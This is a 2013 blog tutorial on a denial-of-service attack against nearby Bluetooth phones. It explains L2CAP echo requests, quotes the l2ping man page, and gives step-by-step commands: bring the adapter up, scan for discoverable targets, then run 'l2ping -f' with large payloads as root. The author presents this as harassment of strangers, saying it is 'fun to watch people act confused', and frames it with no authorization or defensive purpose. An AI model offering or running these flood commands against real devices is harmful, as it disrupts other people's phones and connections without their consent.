
Saturday, December 7, 2013

BLUETOOTH DoS ATTACK

Hi HS, my classes keep me pretty busy these days, so I'm taking a little time out to put up a small tutorial on:
DoS ATTACKING BLUETOOTH DEVICES

We all know what Bluetooth is and how to use it, so I'm going to skip that part.
There are plenty of Bluetooth handsets around us with the radio switched on and in a connectable state. So let's just DoS them.


IS IT POSSIBLE??

Yes it is. Bluetooth has its own "ping": the L2CAP layer defines an Echo Request and an Echo Response, and any connectable device whose address you know will answer them. (Discovery of nearby devices is a separate step, the inquiry scan you run with hcitool scan; the echo exchange happens after an ACL link to the target is up.) The same logic as an ICMP ping flood applies: send echo requests as fast as possible, with as large a payload as possible, and keep the target's radio and stack busy answering you.


PINGING BLUETOOTH? WTF??



Read this excerpt from the Wikipedia article on the Bluetooth protocol stack:

Logical link control and adaptation protocol (L2CAP)
L2CAP is used within the Bluetooth protocol stack. It passes packets to either the Host Controller Interface (HCI) or on a hostless system, directly to the Link Manager/ACL link.
L2CAP's functions include:
Multiplexing data between different higher layer protocols.
Segmentation and reassembly of packets.
Providing one-way transmission management of multicast data to a group of other Bluetooth devices.
Quality of service (QoS) management for higher layer protocols.
L2CAP is used to communicate over the host ACL link. Its connection is established after the ACL link has been set up.
In basic mode, L2CAP provides packets with a payload configurable up to 64 kB, with 672 bytes as the default MTU, and 48 bytes as the minimum mandatory supported MTU. In retransmission and flow control modes, L2CAP can be configured for reliable or asynchronous data per channel by performing retransmissions and CRC checks. Reliability in either of these modes is optionally and/or additionally guaranteed by the lower layer Bluetooth BR/EDR air interface by configuring the number of retransmissions and flush timeout (time after which the radio will flush packets). In-order sequencing is guaranteed by the lower layer.
The EL2CAP specification adds an additional enhanced retransmission mode (ERTM) to the core specification, which is an improved version of retransmission and flow control modes. ERTM is required when using an AMP (Alternate MAC/PHY), such as 802.11 a/b/g/n.



I UNDERSTOOD ONLY L2CAP

Well, that was enough. The part that matters for us is the L2CAP signaling channel: it carries an Echo Request command and the target replies with an Echo Response, which is exactly what the l2ping tool sends and receives. Each request forces the target to accept an ACL packet, pass it up through L2CAP and build a reply, so we will send these packets in bulk, with a big payload, for a successful attack. Keep in mind that the target has to be powered on and connectable, and that the effect depends entirely on how well its stack copes with the flood; an old handset may freeze or lose its audio connection, a modern stack may not notice at all.


TOOL REQUIRED

1) You need a Bluetooth adapter that Linux (BlueZ) recognises as an hciX device, either built in or a USB dongle like the ones shown here:




2) l2ping for Linux. It is part of the BlueZ utilities and comes pre-installed in BackTrack and Kali.


THE COMMANDS


Here's the man page of the l2ping command:


NAME
l2ping - Send L2CAP echo request and receive answer

SYNOPSIS
l2ping [-i <hciX>] [-s size] [-c count] [-t timeout] [-d delay] [-f]
[-r] [-v] bd_addr

DESCRIPTION
L2ping sends a L2CAP echo request to the Bluetooth MAC address bd_addr
given in dotted hex notation.

OPTIONS

-i <hciX>
The command is applied to device hciX, which must be the name
of an installed Bluetooth device (X = 0, 1, 2, ...). If not
specified, the command will be sent to the first available
Bluetooth device.

-s size
The size of the data packets to be sent.

-c count
Send count number of packets then exit.

-t timeout
Wait timeout seconds for the response.

-d delay
Wait delay seconds between pings.

-f Kind of flood ping. Use with care! It reduces the delay time
between packets to 0.

-r Reverse ping (gnip?). Send echo response instead of echo
request.

-v Verify response payload is identical to request payload. It is
not required for remote stacks to return the request payload,
but most stacks do (including Bluez).

bd_addr
The Bluetooth MAC address to be pinged in dotted hex notation
like 01:02:03:ab:cd:ef or 01:EF:cd:aB:02:03

THE ATTACK

First make sure your adapter is up (hciconfig hci0 up) and grab the address of the target with an inquiry scan (hcitool scan); the target must be discoverable for the scan to find it. Then fire up your terminal and type the command as per the man page above, with the address you just found in place of the sample one:

SAMPLE
l2ping -f -t 0.1 11:1f:23:12:21:aa

Two notes on the switches. -f is the flood mode and does the real work: it drops the delay between packets to zero. -t and -d take whole seconds (l2ping parses them with atoi), so "-t 0.1" is read as 0; either leave -t at its default or use -t 1. Add -s with a large size (the default is 44 bytes) to make every echo request heavier for the target, and run the command as root since it needs a raw L2CAP socket.


Successfully tested on many devices. It is fun to watch people act confused.
